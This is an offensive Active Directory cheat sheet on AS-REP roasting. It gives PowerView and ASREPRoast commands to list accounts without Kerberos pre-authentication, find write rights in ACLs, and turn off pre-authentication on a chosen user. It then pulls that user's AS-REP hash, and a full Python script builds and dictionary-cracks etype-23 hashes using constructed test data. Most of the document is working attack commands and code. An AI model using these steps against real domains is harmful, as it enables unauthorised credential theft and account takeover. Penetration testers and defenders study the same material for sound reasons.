AS-REP ROASTING

Any account with Kerberos Pre-Authentication disabled (the DONT_REQ_PREAUTH flag in userAccountControl) is vulnerable to AS-REP Roasting: the KDC answers an AS-REQ for that user without proof of the password, and part of the AS-REP is encrypted with the user's password-derived key, so it can be cracked offline

KERBEROS PRE-AUTH DISABLED

Enumerate domain users without Kerberos Pre-Authentication

PowerView
Get-DomainUser -PreauthNotRequired

AS-REP Roasting for the specific user to get the crackable hash

ASREPRoast
Get-ASREPHash -UserName <USERNAME>

KERBEROS PRE-AUTH NOT DISABLED

Kerberos Pre-Authentication is enabled by default, so most users are not roastable as-is

To AS-REP Roast such a user, Pre-Auth first has to be disabled on that specific account

This needs a write right on the target user object's ACL: GenericAll, GenericWrite, or WriteProperty on userAccountControl

The right must be held by a principal you control (your own user, or a group you are a member of); filter the ACL scan on that identity

Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "<OBJECT>"}

Disable Kerberos Pre-Auth by flipping the DONT_REQ_PREAUTH bit (0x400000 = 4194304) in userAccountControl. -XOR toggles the bit, so run it once only, against a user that currently has Pre-Auth enabled; running the same command again re-enables Pre-Auth, which is also how you clean up afterwards

Set-DomainObject -Identity <USERNAME> -XOR @{useraccountcontrol=4194304}

Verify the flag: the first command returns the user only if DONT_REQ_PREAUTH is now set, the second shows the raw userAccountControl value, which should be the previous value plus 4194304

Get-DomainUser -PreauthNotRequired -Identity <USERNAME> 

Get-DomainUser -PreauthNotRequired -Identity <USERNAME> | Select -ExpandProperty useraccountcontrol

AS-REP Roasting for the specific user to get the crackable hash

ASREPRoast
Get-ASREPHash -UserName <USERNAME>

CRACK
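Offline, the hash goes to hashcat (mode 18200, Kerberos 5 etype 23 AS-REP) or John the Ripper (format krb5asrep). As an added example, not code from this page or from ASREPRoast, the block below reproduces the RC4-HMAC (etype 23) maths those tools run for every candidate, so the hash format and the per-guess cost are visible: the user's NT hash is their Kerberos key, the AS-REP carries an HMAC-MD5 checksum in the clear, and each guess costs one MD4, two HMAC-MD5 and one RC4. The user, domain, password, confounder and EncASRepPart payload are constructed test data; the `$krb5asrep$23$` line layout is hashcat's.

```python
"""AS-REP roasting, offline: build an etype-23 (RC4-HMAC) AS-REP hash line and
crack it the way hashcat -m 18200 does.  Added example; user, domain, password
and payload below are constructed test data, not from any real domain."""
import hashlib
import hmac
import struct
from typing import Iterable, Optional, Tuple

MASK32 = 0xFFFFFFFF
KEY_USAGE_AS_REP_ENC_PART = 8  # RFC 4120 key usage for the AS-REP enc-part


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is absent on many OpenSSL 3 builds."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rol = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK32
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)  # bit length, little-endian
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (F, 0x00000000, list(range(16)), (3, 7, 11, 19)),
        (G, 0x5A827999, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for fn, k, order, shifts in rounds:
            for i, idx in enumerate(order):
                a = rol((a + fn(b, c, d) + X[idx] + k) & MASK32, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate registers for the next step
        h = [(v + w) & MASK32 for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); it is also the user's RC4-HMAC Kerberos key."""
    return md4(password.encode("utf-16-le"))


def hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 keystream XOR; encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def rc4_hmac_encrypt(key: bytes, plaintext: bytes, confounder: bytes) -> Tuple[bytes, bytes]:
    """RFC 4757 RC4-HMAC as the KDC applies it to the AS-REP enc-part.
    Returns (checksum, ciphertext); both are sent in the clear inside the AS-REP."""
    k1 = hmac_md5(key, struct.pack("<I", KEY_USAGE_AS_REP_ENC_PART))
    data = confounder + plaintext
    checksum = hmac_md5(k1, data)
    k3 = hmac_md5(k1, checksum)
    return checksum, rc4(k3, data)


def rc4_hmac_try_key(key: bytes, checksum: bytes, ciphertext: bytes) -> bool:
    """One cracking attempt: derive K3 from the public checksum, decrypt, and check
    whether the HMAC over the recovered plaintext matches.  No KDC involved."""
    k1 = hmac_md5(key, struct.pack("<I", KEY_USAGE_AS_REP_ENC_PART))
    data = rc4(hmac_md5(k1, checksum), ciphertext)
    return hmac.compare_digest(hmac_md5(k1, data), checksum)


def make_asrep_hash(user: str, domain: str, password: str, confounder: bytes) -> str:
    """Emit the hashcat -m 18200 line a roasting tool would print for this user."""
    # Constructed stand-in for the ASN.1 EncASRepPart; its content does not affect the format.
    enc_part = b"\x79\x81\x8c" + b"constructed EncASRepPart payload " * 4
    checksum, ct = rc4_hmac_encrypt(nt_hash(password), enc_part, confounder)
    return f"$krb5asrep$23${user}@{domain}:{checksum.hex()}${ct.hex()}"


def parse_asrep_hash(line: str) -> Tuple[str, bytes, bytes]:
    prefix = "$krb5asrep$23$"
    if not line.startswith(prefix):
        raise ValueError("not an etype-23 AS-REP hash line")
    principal, rest = line[len(prefix):].split(":", 1)
    checksum_hex, ct_hex = rest.split("$", 1)
    return principal, bytes.fromhex(checksum_hex), bytes.fromhex(ct_hex)


def crack_asrep(line: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack: one MD4, two HMAC-MD5 and one RC4 per candidate."""
    _, checksum, ct = parse_asrep_hash(line)
    for candidate in wordlist:
        if rc4_hmac_try_key(nt_hash(candidate), checksum, ct):
            return candidate
    return None


if __name__ == "__main__":
    sample = make_asrep_hash("svc_backup", "CORP.LOCAL", "Winter2023!", bytes(range(8)))
    print(sample)
    print("cracked:", crack_asrep(sample, ["Summer2023!", "Password1", "Winter2023!"]))
```

Running the block prints a sample `$krb5asrep$23$svc_backup@CORP.LOCAL:...` line and recovers the constructed password from a three-word list. The same check is what makes the attack cheap: nothing in it rate-limits, and the checksum in the reply is a verifier for any guess. If the KDC answers with an AES key (etype 17 or 18) the line starts with a different etype number and the per-guess work is a PBKDF2 instead of an MD4; the tools handle that with separate modes, and this block does not.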
